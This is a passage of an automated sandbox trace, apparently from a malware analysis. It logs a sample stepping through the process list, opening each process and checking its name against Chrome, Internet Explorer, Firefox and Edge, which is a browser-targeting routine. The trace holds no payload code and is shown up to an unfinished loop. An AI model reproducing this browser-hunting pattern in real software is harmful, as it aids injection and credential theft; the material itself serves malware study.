	[0251.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.919] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.919] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.919] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.919] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.920] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.920] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.920] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0251.921] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa3e0
	[0251.921] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.921] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0251.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.922] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.922] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.922] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0251.923] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.923] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.923] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.924] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa3e4
	[0251.924] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.924] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0251.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.925] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.925] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0251.926] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.926] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0251.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa3e8
	[0251.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.927] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0251.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.928] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.928] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0251.929] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.929] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0251.930] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa3ec
	[0251.930] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.930] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0251.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.931] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.931] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.931] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0251.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.932] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.932] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0251.933] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa3f0
	[0251.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.933] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0251.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.934] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.934] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0251.934] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.934] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.935] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0251.936] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa3f4
	[0251.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.936] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.936] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.937] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.937] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.937] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa3f8
	[0251.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.939] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.939] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.940] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.940] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.942] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa3fc
	[0251.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.942] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.942] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.943] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.943] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.944] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.945] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa400
	[0251.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.945] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.946] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa404
	[0251.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.947] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.947] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.948] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.948] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.948] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.949] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa408
	[0251.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.949] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.950] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.950] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.951] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.951] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.952] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa40c
	[0251.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.953] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.953] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.954] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.954] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.955] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.958] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa410
	[0251.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.958] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.959] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.959] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.960] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0251.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa414
	[0251.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.961] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0251.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.962] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.962] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0251.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.963] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.963] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.964] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa418
	[0251.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.964] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.965] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.965] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.965] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.966] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.966] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0251.967] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa41c
	[0251.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.967] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.968] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.968] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.969] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.969] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.969] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0251.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa420
	[0251.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.970] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0251.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.971] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.971] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0251.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.972] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.972] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.973] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa424
	[0251.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.973] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0251.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.974] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.974] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0251.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.974] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.974] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0251.975] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa428
	[0251.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.975] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0251.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0251.976] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.976] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.977] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0251.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa42c
	[0251.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.978] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0251.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.978] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.979] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0251.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.979] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0251.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa430
	[0251.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.981] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0251.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.981] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.982] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0251.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.982] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.982] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0251.983] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa434
	[0251.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.984] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0251.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.984] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.985] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0251.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.985] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.985] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0251.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0251.987] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0251.988] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa438
	[0251.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.988] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0251.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.989] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.990] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0251.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.990] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0251.991] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0251.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa43c
	[0251.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.992] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0251.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.992] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0251.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0251.992] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
